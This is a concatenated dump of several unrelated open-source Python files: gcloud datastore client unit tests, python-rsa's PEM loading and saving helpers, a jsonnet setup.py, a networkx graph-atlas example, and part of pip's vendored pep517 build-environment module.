client.get_multi = _get_multi
key, missing, deferred = object(), [], []
self.assertTrue(client.get(key, missing, deferred, TXN_ID) is _entity)
self.assertEqual(_called_with[0][0], ())
self.assertEqual(_called_with[0][1]['keys'], [key])
self.assertTrue(_called_with[0][1]['missing'] is missing)
self.assertTrue(_called_with[0][1]['deferred'] is deferred)
self.assertEqual(_called_with[0][1]['transaction'], TXN_ID)
def test_get_multi_no_keys(self):
creds = object()
client = self._makeOne(credentials=creds)
results = client.get_multi([])
self.assertEqual(results, [])
def test_get_multi_miss(self):
from gcloud.datastore.key import Key
creds = object()
client = self._makeOne(credentials=creds)
client.connection._add_lookup_result()
key = Key('Kind', 1234, project=self.PROJECT)
results = client.get_multi([key])
self.assertEqual(results, [])
def test_get_multi_miss_w_missing(self):
from gcloud.datastore._generated import entity_pb2
from gcloud.datastore.key import Key
KIND = 'Kind'
ID = 1234
# Make a missing entity pb to be returned from mock backend.
missed = entity_pb2.Entity()
missed.key.partition_id.project_id = self.PROJECT
path_element = missed.key.path.add()
path_element.kind = KIND
path_element.id = ID
creds = object()
client = self._makeOne(credentials=creds)
# Set missing entity on mock connection.
client.connection._add_lookup_result(missing=[missed])
key = Key(KIND, ID, project=self.PROJECT)
missing = []
entities = client.get_multi([key], missing=missing)
self.assertEqual(entities, [])
self.assertEqual([missed.key.to_protobuf() for missed in missing],
[key.to_protobuf()])
def test_get_multi_w_missing_non_empty(self):
from gcloud.datastore.key import Key
creds = object()
client = self._makeOne(credentials=creds)
key = Key('Kind', 1234, project=self.PROJECT)
missing = ['this', 'list', 'is', 'not', 'empty']
self.assertRaises(ValueError, client.get_multi,
[key], missing=missing)
def test_get_multi_w_deferred_non_empty(self):
from gcloud.datastore.key import Key
creds = object()
client = self._makeOne(credentials=creds)
key = Key('Kind', 1234, project=self.PROJECT)
deferred = ['this', 'list', 'is', 'not', 'empty']
self.assertRaises(ValueError, client.get_multi,
[key], deferred=deferred)
def test_get_multi_miss_w_deferred(self):
from gcloud.datastore.key import Key
key = Key('Kind', 1234, project=self.PROJECT)
# Set deferred entity on mock connection.
creds = object()
client = self._makeOne(credentials=creds)
client.connection._add_lookup_result(deferred=[key.to_protobuf()])
deferred = []
entities = client.get_multi([key], deferred=deferred)
self.assertEqual(entities, [])
self.assertEqual([def_key.to_protobuf() for def_key in deferred],
[key.to_protobuf()])
def test_get_multi_w_deferred_from_backend_but_not_passed(self):
from gcloud.datastore._generated import entity_pb2
from gcloud.datastore.entity import Entity
from gcloud.datastore.key import Key
key1 = Key('Kind', project=self.PROJECT)
key1_pb = key1.to_protobuf()
key2 = Key('Kind', 2345, project=self.PROJECT)
key2_pb = key2.to_protobuf()
entity1_pb = entity_pb2.Entity()
entity1_pb.key.CopyFrom(key1_pb)
entity2_pb = entity_pb2.Entity()
entity2_pb.key.CopyFrom(key2_pb)
creds = object()
client = self._makeOne(credentials=creds)
# mock up two separate requests
client.connection._add_lookup_result([entity1_pb], deferred=[key2_pb])
client.connection._add_lookup_result([entity2_pb])
missing = []
found = client.get_multi([key1, key2], missing=missing)
self.assertEqual(len(found), 2)
self.assertEqual(len(missing), 0)
# Check the actual contents on the response.
self.assertTrue(isinstance(found[0], Entity))
self.assertEqual(found[0].key.path, key1.path)
self.assertEqual(found[0].key.project, key1.project)
self.assertTrue(isinstance(found[1], Entity))
self.assertEqual(found[1].key.path, key2.path)
self.assertEqual(found[1].key.project, key2.project)
cw = client.connection._lookup_cw
self.assertEqual(len(cw), 2)
ds_id, k_pbs, eventual, tid = cw[0]
self.assertEqual(ds_id, self.PROJECT)
self.assertEqual(len(k_pbs), 2)
self.assertEqual(key1_pb, k_pbs[0])
self.assertEqual(key2_pb, k_pbs[1])
self.assertFalse(eventual)
self.assertTrue(tid is None)
ds_id, k_pbs, eventual, tid = cw[1]
self.assertEqual(ds_id, self.PROJECT)
self.assertEqual(len(k_pbs), 1)
self.assertEqual(key2_pb, k_pbs[0])
self.assertFalse(eventual)
self.assertTrue(tid is None)
def test_get_multi_hit(self):
from gcloud.datastore.key import Key
KIND = 'Kind'
ID = 1234
PATH = [{'kind': KIND, 'id': ID}]
# Make a found entity pb to be returned from mock backend.
entity_pb = _make_entity_pb(self.PROJECT, KIND, ID, 'foo', 'Foo')
# Make a connection to return the entity pb.
creds = object()
client = self._makeOne(credentials=creds)
client.connection._add_lookup_result([entity_pb])
key = Key(KIND, ID, project=self.PROJECT)
result, = client.get_multi([key])
new_key = result.key
# Check the returned value is as expected.
self.assertFalse(new_key is key)
self.assertEqual(new_key.project, self.PROJECT)
self.assertEqual(new_key.path, PATH)
self.assertEqual(list(result), ['foo'])
self.assertEqual(result['foo'], 'Foo')
def test_get_multi_hit_w_transaction(self):
from gcloud.datastore.key import Key
TXN_ID = '123'
KIND = 'Kind'
ID = 1234
PATH = [{'kind': KIND, 'id': ID}]
# Make a found entity pb to be returned from mock backend.
entity_pb = _make_entity_pb(self.PROJECT, KIND, ID, 'foo', 'Foo')
# Make a connection to return the entity pb.
creds = object()
client = self._makeOne(credentials=creds)
client.connection._add_lookup_result([entity_pb])
key = Key(KIND, ID, project=self.PROJECT)
txn = client.transaction()
txn._id = TXN_ID
result, = client.get_multi([key], transaction=txn)
new_key = result.key
# Check the returned value is as expected.
self.assertFalse(new_key is key)
self.assertEqual(new_key.project, self.PROJECT)
self.assertEqual(new_key.path, PATH)
self.assertEqual(list(result), ['foo'])
self.assertEqual(result['foo'], 'Foo')
cw = client.connection._lookup_cw
self.assertEqual(len(cw), 1)
_, _, _, transaction_id = cw[0]
self.assertEqual(transaction_id, TXN_ID)
def test_get_multi_hit_multiple_keys_same_project(self):
from gcloud.datastore.key import Key
KIND = 'Kind'
ID1 = 1234
ID2 = 2345
# Make a found entity pb to be returned from mock backend.
entity_pb1 = _make_entity_pb(self.PROJECT, KIND, ID1)
entity_pb2 = _make_entity_pb(self.PROJECT, KIND, ID2)
# Make a connection to return the entity pbs.
creds = object()
client = self._makeOne(credentials=creds)
client.connection._add_lookup_result([entity_pb1, entity_pb2])
key1 = Key(KIND, ID1, project=self.PROJECT)
key2 = Key(KIND, ID2, project=self.PROJECT)
retrieved1, retrieved2 = client.get_multi([key1, key2])
# Check values match.
self.assertEqual(retrieved1.key.path, key1.path)
self.assertEqual(dict(retrieved1), {})
self.assertEqual(retrieved2.key.path, key2.path)
self.assertEqual(dict(retrieved2), {})
def test_get_multi_hit_multiple_keys_different_project(self):
from gcloud.datastore.key import Key
PROJECT1 = 'PROJECT'
PROJECT2 = 'PROJECT-ALT'
# Make sure our IDs are actually different.
self.assertNotEqual(PROJECT1, PROJECT2)
key1 = Key('KIND', 1234, project=PROJECT1)
key2 = Key('KIND', 1234, project=PROJECT2)
creds = object()
client = self._makeOne(credentials=creds)
with self.assertRaises(ValueError):
client.get_multi([key1, key2])
def test_get_multi_max_loops(self):
from gcloud._testing import _Monkey
from gcloud.datastore import client as _MUT
from gcloud.datastore.key import Key
KIND = 'Kind'
ID = 1234
# Make a found entity pb to be returned from mock backend.
entity_pb = _make_entity_pb(self.PROJECT, KIND, ID, 'foo', 'Foo')
# Make a connection to return the entity pb.
creds = object()
client = self._makeOne(credentials=creds)
client.connection._add_lookup_result([entity_pb])
key = Key(KIND, ID, project=self.PROJECT)
deferred = []
missing = []
with _Monkey(_MUT, _MAX_LOOPS=-1):
result = client.get_multi([key], missing=missing,
deferred=deferred)
# Make sure we have no results, even though the connection has been
# set up as in `test_hit` to return a single result.
self.assertEqual(result, [])
self.assertEqual(missing, [])
self.assertEqual(deferred, [])
def test_put(self):
_called_with = []
def _put_multi(*args, **kw):
_called_with.append((args, kw))
creds = object()
client = self._makeOne(credentials=creds)
client.put_multi = _put_multi
entity = object()
client.put(entity)
self.assertEqual(_called_with[0][0], ())
self.assertEqual(_called_with[0][1]['entities'], [entity])
def test_put_multi_no_entities(self):
creds = object()
client = self._makeOne(credentials=creds)
self.assertEqual(client.put_multi([]), None)
def test_put_multi_w_single_empty_entity(self):
# https://github.com/GoogleCloudPlatform/gcloud-python/issues/649
from gcloud.datastore.entity import Entity
creds = object()
client = self._makeOne(credentials=creds)
self.assertRaises(ValueError, client.put_multi, Entity())
def test_put_multi_no_batch_w_partial_key(self):
from gcloud.datastore.helpers import _property_tuples
from gcloud.datastore.test_batch import _Entity
from gcloud.datastore.test_batch import _Key
from gcloud.datastore.test_batch import _KeyPB
from gcloud.datastore.test_batch import _mutated_pb
entity = _Entity(foo=u'bar')
key = entity.key = _Key(self.PROJECT)
key._id = None
creds = object()
client = self._makeOne(credentials=creds)
client.connection._commit.append([_KeyPB(key)])
result = client.put_multi([entity])
self.assertTrue(result is None)
self.assertEqual(len(client.connection._commit_cw), 1)
(project,
commit_req, transaction_id) = client.connection._commit_cw[0]
self.assertEqual(project, self.PROJECT)
mutated_entity = _mutated_pb(self, commit_req.mutations, 'insert')
self.assertEqual(mutated_entity.key, key.to_protobuf())
prop_list = list(_property_tuples(mutated_entity))
self.assertTrue(len(prop_list), 1)
name, value_pb = prop_list[0]
self.assertEqual(name, 'foo')
self.assertEqual(value_pb.string_value, u'bar')
self.assertTrue(transaction_id is None)
def test_put_multi_existing_batch_w_completed_key(self):
from gcloud.datastore.helpers import _property_tuples
from gcloud.datastore.test_batch import _Entity
from gcloud.datastore.test_batch import _Key
from gcloud.datastore.test_batch import _mutated_pb
creds = object()
client = self._makeOne(credentials=creds)
entity = _Entity(foo=u'bar')
key = entity.key = _Key(self.PROJECT)
with _NoCommitBatch(client) as CURR_BATCH:
result = client.put_multi([entity])
self.assertEqual(result, None)
mutated_entity = _mutated_pb(self, CURR_BATCH.mutations, 'upsert')
self.assertEqual(mutated_entity.key, key.to_protobuf())
prop_list = list(_property_tuples(mutated_entity))
self.assertTrue(len(prop_list), 1)
name, value_pb = prop_list[0]
self.assertEqual(name, 'foo')
self.assertEqual(value_pb.string_value, u'bar')
def test_delete(self):
_called_with = []
def _delete_multi(*args, **kw):
_called_with.append((args, kw))
creds = object()
client = self._makeOne(credentials=creds)
client.delete_multi = _delete_multi
key = object()
client.delete(key)
self.assertEqual(_called_with[0][0], ())
self.assertEqual(_called_with[0][1]['keys'], [key])
def test_delete_multi_no_keys(self):
creds = object()
client = self._makeOne(credentials=creds)
result = client.delete_multi([])
self.assertEqual(result, None)
self.assertEqual(len(client.connection._commit_cw), 0)
def test_delete_multi_no_batch(self):
from gcloud.datastore.test_batch import _Key
from gcloud.datastore.test_batch import _mutated_pb
key = _Key(self.PROJECT)
creds = object()
client = self._makeOne(credentials=creds)
client.connection._commit.append([])
result = client.delete_multi([key])
self.assertEqual(result, None)
self.assertEqual(len(client.connection._commit_cw), 1)
(project,
commit_req, transaction_id) = client.connection._commit_cw[0]
self.assertEqual(project, self.PROJECT)
mutated_key = _mutated_pb(self, commit_req.mutations, 'delete')
self.assertEqual(mutated_key, key.to_protobuf())
self.assertTrue(transaction_id is None)
def test_delete_multi_w_existing_batch(self):
from gcloud.datastore.test_batch import _Key
from gcloud.datastore.test_batch import _mutated_pb
creds = object()
client = self._makeOne(credentials=creds)
key = _Key(self.PROJECT)
with _NoCommitBatch(client) as CURR_BATCH:
result = client.delete_multi([key])
self.assertEqual(result, None)
mutated_key = _mutated_pb(self, CURR_BATCH.mutations, 'delete')
self.assertEqual(mutated_key, key._key)
self.assertEqual(len(client.connection._commit_cw), 0)
def test_delete_multi_w_existing_transaction(self):
from gcloud.datastore.test_batch import _Key
from gcloud.datastore.test_batch import _mutated_pb
creds = object()
client = self._makeOne(credentials=creds)
key = _Key(self.PROJECT)
with _NoCommitTransaction(client) as CURR_XACT:
result = client.delete_multi([key])
self.assertEqual(result, None)
mutated_key = _mutated_pb(self, CURR_XACT.mutations, 'delete')
self.assertEqual(mutated_key, key._key)
self.assertEqual(len(client.connection._commit_cw), 0)
def test_allocate_ids_w_partial_key(self):
from gcloud.datastore.test_batch import _Key
NUM_IDS = 2
INCOMPLETE_KEY = _Key(self.PROJECT)
INCOMPLETE_KEY._id = None
creds = object()
client = self._makeOne(credentials=creds)
result = client.allocate_ids(INCOMPLETE_KEY, NUM_IDS)
# Check the IDs returned.
self.assertEqual([key._id for key in result], list(range(NUM_IDS)))
def test_allocate_ids_with_completed_key(self):
from gcloud.datastore.test_batch import _Key
creds = object()
client = self._makeOne(credentials=creds)
COMPLETE_KEY = _Key(self.PROJECT)
self.assertRaises(ValueError, client.allocate_ids, COMPLETE_KEY, 2)
def test_key_w_project(self):
KIND = 'KIND'
ID = 1234
creds = object()
client = self._makeOne(credentials=creds)
self.assertRaises(TypeError,
client.key, KIND, ID, project=self.PROJECT)
def test_key_wo_project(self):
from gcloud.datastore import client as MUT
from gcloud._testing import _Monkey
KIND = 'KIND'
ID = 1234
creds = object()
client = self._makeOne(credentials=creds)
with _Monkey(MUT, Key=_Dummy):
key = client.key(KIND, ID)
self.assertTrue(isinstance(key, _Dummy))
self.assertEqual(key.args, (KIND, ID))
expected_kwargs = {
'project': self.PROJECT,
'namespace': None,
}
self.assertEqual(key.kwargs, expected_kwargs)
def test_key_w_namespace(self):
from gcloud.datastore import client as MUT
from gcloud._testing import _Monkey
KIND = 'KIND'
ID = 1234
NAMESPACE = object()
creds = object()
client = self._makeOne(namespace=NAMESPACE, credentials=creds)
with _Monkey(MUT, Key=_Dummy):
key = client.key(KIND, ID)
self.assertTrue(isinstance(key, _Dummy))
expected_kwargs = {
'project': self.PROJECT,
'namespace': NAMESPACE,
}
self.assertEqual(key.kwargs, expected_kwargs)
def test_key_w_namespace_collision(self):
from gcloud.datastore import client as MUT
from gcloud._testing import _Monkey
KIND = 'KIND'
ID = 1234
NAMESPACE1 = object()
NAMESPACE2 = object()
creds = object()
client = self._makeOne(namespace=NAMESPACE1, credentials=creds)
with _Monkey(MUT, Key=_Dummy):
key = client.key(KIND, ID, namespace=NAMESPACE2)
self.assertTrue(isinstance(key, _Dummy))
expected_kwargs = {
'project': self.PROJECT,
'namespace': NAMESPACE2,
}
self.assertEqual(key.kwargs, expected_kwargs)
def test_batch(self):
from gcloud.datastore import client as MUT
from gcloud._testing import _Monkey
creds = object()
client = self._makeOne(credentials=creds)
with _Monkey(MUT, Batch=_Dummy):
batch = client.batch()
self.assertTrue(isinstance(batch, _Dummy))
self.assertEqual(batch.args, (client,))
self.assertEqual(batch.kwargs, {})
def test_transaction_defaults(self):
from gcloud.datastore import client as MUT
from gcloud._testing import _Monkey
creds = object()
client = self._makeOne(credentials=creds)
with _Monkey(MUT, Transaction=_Dummy):
xact = client.transaction()
self.assertTrue(isinstance(xact, _Dummy))
self.assertEqual(xact.args, (client,))
self.assertEqual(xact.kwargs, {})
def test_query_w_client(self):
KIND = 'KIND'
creds = object()
client = self._makeOne(credentials=creds)
other = self._makeOne(credentials=object())
self.assertRaises(TypeError, client.query, kind=KIND, client=other)
def test_query_w_project(self):
KIND = 'KIND'
creds = object()
client = self._makeOne(credentials=creds)
self.assertRaises(TypeError,
client.query, kind=KIND, project=self.PROJECT)
def test_query_w_defaults(self):
from gcloud.datastore import client as MUT
from gcloud._testing import _Monkey
creds = object()
client = self._makeOne(credentials=creds)
with _Monkey(MUT, Query=_Dummy):
query = client.query()
self.assertTrue(isinstance(query, _Dummy))
self.assertEqual(query.args, (client,))
expected_kwargs = {
'project': self.PROJECT,
'namespace': None,
}
self.assertEqual(query.kwargs, expected_kwargs)
def test_query_explicit(self):
from gcloud.datastore import client as MUT
from gcloud._testing import _Monkey
KIND = 'KIND'
NAMESPACE = 'NAMESPACE'
ANCESTOR = object()
FILTERS = [('PROPERTY', '==', 'VALUE')]
PROJECTION = ['__key__']
ORDER = ['PROPERTY']
DISTINCT_ON = ['DISTINCT_ON']
creds = object()
client = self._makeOne(credentials=creds)
with _Monkey(MUT, Query=_Dummy):
query = client.query(
kind=KIND,
namespace=NAMESPACE,
ancestor=ANCESTOR,
filters=FILTERS,
projection=PROJECTION,
order=ORDER,
distinct_on=DISTINCT_ON,
)
self.assertTrue(isinstance(query, _Dummy))
self.assertEqual(query.args, (client,))
kwargs = {
'project': self.PROJECT,
'kind': KIND,
'namespace': NAMESPACE,
'ancestor': ANCESTOR,
'filters': FILTERS,
'projection': PROJECTION,
'order': ORDER,
'distinct_on': DISTINCT_ON,
}
self.assertEqual(query.kwargs, kwargs)
def test_query_w_namespace(self):
from gcloud.datastore import client as MUT
from gcloud._testing import _Monkey
KIND = 'KIND'
NAMESPACE = object()
creds = object()
client = self._makeOne(namespace=NAMESPACE, credentials=creds)
with _Monkey(MUT, Query=_Dummy):
query = client.query(kind=KIND)
self.assertTrue(isinstance(query, _Dummy))
self.assertEqual(query.args, (client,))
expected_kwargs = {
'project': self.PROJECT,
'namespace': NAMESPACE,
'kind': KIND,
}
self.assertEqual(query.kwargs, expected_kwargs)
def test_query_w_namespace_collision(self):
from gcloud.datastore import client as MUT
from gcloud._testing import _Monkey
KIND = 'KIND'
NAMESPACE1 = object()
NAMESPACE2 = object()
creds = object()
client = self._makeOne(namespace=NAMESPACE1, credentials=creds)
with _Monkey(MUT, Query=_Dummy):
query = client.query(kind=KIND, namespace=NAMESPACE2)
self.assertTrue(isinstance(query, _Dummy))
self.assertEqual(query.args, (client,))
expected_kwargs = {
'project': self.PROJECT,
'namespace': NAMESPACE2,
'kind': KIND,
}
self.assertEqual(query.kwargs, expected_kwargs)
class _Dummy(object):
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
class _MockConnection(object):
def __init__(self, credentials=None, http=None):
self.credentials = credentials
self.http = http
self._lookup_cw = []
self._lookup = []
self._commit_cw = []
self._commit = []
self._alloc_cw = []
self._alloc = []
self._index_updates = 0
def _add_lookup_result(self, results=(), missing=(), deferred=()):
self._lookup.append((list(results), list(missing), list(deferred)))
def lookup(self, project, key_pbs, eventual=False, transaction_id=None):
self._lookup_cw.append((project, key_pbs, eventual, transaction_id))
triple, self._lookup = self._lookup[0], self._lookup[1:]
results, missing, deferred = triple
return results, missing, deferred
def commit(self, project, commit_request, transaction_id):
self._commit_cw.append((project, commit_request, transaction_id))
response, self._commit = self._commit[0], self._commit[1:]
return self._index_updates, response
def allocate_ids(self, project, key_pbs):
from gcloud.datastore.test_connection import _KeyProto
self._alloc_cw.append((project, key_pbs))
num_pbs = len(key_pbs)
return [_KeyProto(i) for i in list(range(num_pbs))]
class _NoCommitBatch(object):
def __init__(self, client):
from gcloud.datastore.batch import Batch
self._client = client
self._batch = Batch(client)
def __enter__(self):
self._client._push_batch(self._batch)
return self._batch
def __exit__(self, *args):
self._client._pop_batch()
class _NoCommitTransaction(object):
def __init__(self, client, transaction_id='TRANSACTION'):
from gcloud.datastore.transaction import Transaction
self._client = client
xact = self._transaction = Transaction(client)
xact._id = transaction_id
def __enter__(self):
self._client._push_batch(self._transaction)
return self._transaction
def __exit__(self, *args):
self._client._pop_batch()
| mit |
rkokkelk/CouchPotatoServer | libs/rsa/pem.py | 216 | 3372 | # -*- coding: utf-8 -*-
#
# Copyright 2011 Sybren A. Stüvel <sybren@stuvel.eu>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''Functions that load and write PEM-encoded files.'''
import base64
from rsa._compat import b, is_bytes
def _markers(pem_marker):
'''
Returns the start and end PEM markers
'''
if is_bytes(pem_marker):
pem_marker = pem_marker.decode('utf-8')
return (b('-----BEGIN %s-----' % pem_marker),
b('-----END %s-----' % pem_marker))
def load_pem(contents, pem_marker):
'''Loads a PEM file.
@param contents: the contents of the file to interpret
@param pem_marker: the marker of the PEM content, such as 'RSA PRIVATE KEY'
when your file has '-----BEGIN RSA PRIVATE KEY-----' and
'-----END RSA PRIVATE KEY-----' markers.
@return the base64-decoded content between the start and end markers.
@raise ValueError: when the content is invalid, for example when the start
marker cannot be found.
'''
(pem_start, pem_end) = _markers(pem_marker)
pem_lines = []
in_pem_part = False
for line in contents.splitlines():
line = line.strip()
# Skip empty lines
if not line:
continue
# Handle start marker
if line == pem_start:
if in_pem_part:
raise ValueError('Seen start marker "%s" twice' % pem_start)
in_pem_part = True
continue
# Skip stuff before first marker
if not in_pem_part:
continue
# Handle end marker
if in_pem_part and line == pem_end:
in_pem_part = False
break
# Load fields
if b(':') in line:
continue
pem_lines.append(line)
# Do some sanity checks
if not pem_lines:
raise ValueError('No PEM start marker "%s" found' % pem_start)
if in_pem_part:
raise ValueError('No PEM end marker "%s" found' % pem_end)
# Base64-decode the contents
pem = b('').join(pem_lines)
return base64.decodestring(pem)
def save_pem(contents, pem_marker):
'''Saves a PEM file.
@param contents: the contents to encode in PEM format
@param pem_marker: the marker of the PEM content, such as 'RSA PRIVATE KEY'
when your file has '-----BEGIN RSA PRIVATE KEY-----' and
'-----END RSA PRIVATE KEY-----' markers.
@return the base64-encoded content between the start and end markers.
'''
(pem_start, pem_end) = _markers(pem_marker)
b64 = base64.encodestring(contents).replace(b('\n'), b(''))
pem_lines = [pem_start]
for block_start in range(0, len(b64), 64):
block = b64[block_start:block_start + 64]
pem_lines.append(block)
pem_lines.append(pem_end)
pem_lines.append(b(''))
return b('\n').join(pem_lines)
| gpl-3.0 |
sebgoa/kubeless | vendor/github.com/google/go-jsonnet/cpp-jsonnet/setup.py | 3 | 2333 | # Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from setuptools import setup
from setuptools import Extension
from setuptools.command.build_ext import build_ext as BuildExt
from subprocess import Popen
DIR = os.path.abspath(os.path.dirname(__file__))
LIB_OBJECTS = [
'core/desugarer.o',
'core/formatter.o',
'core/libjsonnet.o',
'core/lexer.o',
'core/parser.o',
'core/pass.o',
'core/static_analysis.o',
'core/string_utils.o',
'core/vm.o',
'third_party/md5/md5.o'
]
MODULE_SOURCES = ['python/_jsonnet.c']
def get_version():
"""
Parses the version out of libjsonnet.h
"""
with open(os.path.join(DIR, 'include/libjsonnet.h')) as f:
for line in f:
if '#define' in line and 'LIB_JSONNET_VERSION' in line:
v_code = line.partition('LIB_JSONNET_VERSION')[2].strip('\n "')
if v_code[0] == "v":
v_code = v_code[1:]
return v_code
class BuildJsonnetExt(BuildExt):
def run(self):
p = Popen(['make'] + LIB_OBJECTS, cwd=DIR)
p.wait()
if p.returncode != 0:
raise Exception('Could not build %s' % (', '.join(LIB_OBJECTS)))
BuildExt.run(self)
jsonnet_ext = Extension(
'_jsonnet',
sources=MODULE_SOURCES,
extra_objects=LIB_OBJECTS,
include_dirs = ['include', 'third_party/md5'],
language='c++'
)
setup(name='jsonnet',
url='https://jsonnet.org',
description='Python bindings for Jsonnet - The data templating language ',
author='David Cunningham',
author_email='dcunnin@google.com',
version=get_version(),
cmdclass={
'build_ext': BuildJsonnetExt,
},
ext_modules=[jsonnet_ext],
test_suite="python._jsonnet_test",
)
| apache-2.0 |
jfinkels/networkx | examples/graph/atlas.py | 4 | 2761 | #!/usr/bin/env python
"""
Atlas of all graphs of 6 nodes or less.
"""
# Author: Aric Hagberg (hagberg@lanl.gov)
# Copyright (C) 2004-2016 by
# Aric Hagberg <hagberg@lanl.gov>
# Dan Schult <dschult@colgate.edu>
# Pieter Swart <swart@lanl.gov>
# All rights reserved.
# BSD license.
import networkx as nx
from networkx.generators.atlas import *
from networkx.algorithms.isomorphism.isomorph import graph_could_be_isomorphic as isomorphic
import random
def atlas6():
""" Return the atlas of all connected graphs of 6 nodes or less.
Attempt to check for isomorphisms and remove.
"""
Atlas = graph_atlas_g()[0:208] # 208
# remove isolated nodes, only connected graphs are left
U = nx.Graph() # graph for union of all graphs in atlas
for G in Atlas:
zerodegree = [n for n in G if G.degree(n)==0]
for n in zerodegree:
G.remove_node(n)
U = nx.disjoint_union(U, G)
# list of graphs of all connected components
C = nx.connected_component_subgraphs(U)
UU = nx.Graph()
# do quick isomorphic-like check, not a true isomorphism checker
nlist = [] # list of nonisomorphic graphs
for G in C:
# check against all nonisomorphic graphs so far
if not iso(G, nlist):
nlist.append(G)
UU = nx.disjoint_union(UU, G) # union the nonisomorphic graphs
return UU
def iso(G1, glist):
"""Quick and dirty nonisomorphism checker used to check isomorphisms."""
for G2 in glist:
if isomorphic(G1, G2):
return True
return False
if __name__ == '__main__':
G=atlas6()
print("graph has %d nodes with %d edges"\
%(nx.number_of_nodes(G), nx.number_of_edges(G)))
print(nx.number_connected_components(G), "connected components")
try:
import pygraphviz
from networkx.drawing.nx_agraph import graphviz_layout
except ImportError:
try:
import pydot
from networkx.drawing.nx_pydot import graphviz_layout
except ImportError:
raise ImportError("This example needs Graphviz and either "
"PyGraphviz or pydot")
import matplotlib.pyplot as plt
plt.figure(1, figsize=(8, 8))
# layout graphs with positions using graphviz neato
pos = graphviz_layout(G, prog="neato")
# color nodes the same in each connected subgraph
C = nx.connected_component_subgraphs(G)
for g in C:
c = [random.random()] * nx.number_of_nodes(g) # random color...
nx.draw(g,
pos,
node_size=40,
node_color=c,
vmin=0.0,
vmax=1.0,
with_labels=False
)
plt.savefig("atlas.png", dpi=75)
| bsd-3-clause |
kenxwagner/PythonPlay | Project/webscrap/websc/Lib/site-packages/pip/_vendor/pep517/envbuild.py | 10 | 6024 | """Build wheels/sdists by installing build deps to a temporary environment.
"""
import os
import logging
import toml
import shutil
from subprocess import check_call
import sys
from sysconfig import get_paths
from tempfile import mkdtemp
from .wrappers import Pep517HookCaller, LoggerWrapper
log = logging.getLogger(__name__)
def _load_pyproject(source_dir):
with open(os.path.join(source_dir, 'pyproject.toml')) as f:
pyproject_data = toml.load(f)
buildsys = pyproject_data['build-system']
return (
buildsys['requires'],
buildsys['build-backend'],
buildsys.get('backend-path'),
)
class BuildEnvironment(object):
"""Context manager to install build deps in a simple temporary environment
Based on code I wrote for pip, which is MIT licensed.
"""
# Copyright (c) 2008-2016 The pip developers (see AUTHORS.txt file)
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
path = None
def __init__(self, cleanup=True):
self._cleanup = cleanup
def __enter__(self):
self.path = mkdtemp(prefix='pep517-build-env-')
log.info('Temporary build environment: %s', self.path)
self.save_path = os.environ.get('PATH', None)
self.save_pythonpath = os.environ.get('PYTHONPATH', None)
install_scheme = 'nt' if (os.name == 'nt') else 'posix_prefix'
install_dirs = get_paths(install_scheme, vars={
'base': self.path,
'platbase': self.path,
})
scripts = install_dirs['scripts']
if self.save_path:
os.environ['PATH'] = scripts + os.pathsep + self.save_path
else:
os.environ['PATH'] = scripts + os.pathsep + os.defpath
if install_dirs['purelib'] == install_dirs['platlib']:
lib_dirs = install_dirs['purelib']
else:
lib_dirs = install_dirs['purelib'] + os.pathsep + \
install_dirs['platlib']
if self.save_pythonpath:
os.environ['PYTHONPATH'] = lib_dirs + os.pathsep + \
self.save_pythonpath
else:
os.environ['PYTHONPATH'] = lib_dirs
return self
def pip_install(self, reqs):
"""Install dependencies into this env by calling pip in a subprocess"""
if not reqs:
return
log.info('Calling pip to install %s', reqs)
cmd = [
sys.executable, '-m', 'pip', 'install', '--ignore-installed',
'--prefix', self.path] + list(reqs)
check_call(
cmd,
stdout=LoggerWrapper(log, logging.INFO),
stderr=LoggerWrapper(log, logging.ERROR),
)
def __exit__(self, exc_type, exc_val, exc_tb):
needs_cleanup = (
self._cleanup and
self.path is not None and
os.path.isdir(self.path)
)
if needs_cleanup:
shutil.rmtree(self.path)
if self.save_path is None:
os.environ.pop('PATH', None)
else:
os.environ['PATH'] = self.save_path
if self.save_pythonpath is None:
os.environ.pop('PYTHONPATH', None)
else:
os.environ['PYTHONPATH'] = self.save_pythonpath
def build_wheel(source_dir, wheel_dir, config_settings=None):
"""Build a wheel from a source directory using PEP 517 hooks.
:param str source_dir: Source directory containing pyproject.toml
:param str wheel_dir: Target directory to create wheel in
:param dict config_settings: Options to pass to build backend
This is a blocking function which will run pip in a subprocess to install
build requirements.
"""
if config_settings is None:
config_settings = {}
requires, backend, backend_path = _load_pyproject(source_dir)
hooks = Pep517HookCaller(source_dir, backend, backend_path)
with BuildEnvironment() as env:
env.pip_install(requires)
reqs = hooks.get_requires_for_build_wheel(config_settings)
env.pip_install(reqs)
return hooks.build_wheel(wheel_dir, config_settings)
def build_sdist(source_dir, sdist_dir, config_settings=None):
"""Build an sdist from a source directory using PEP 517 hooks.
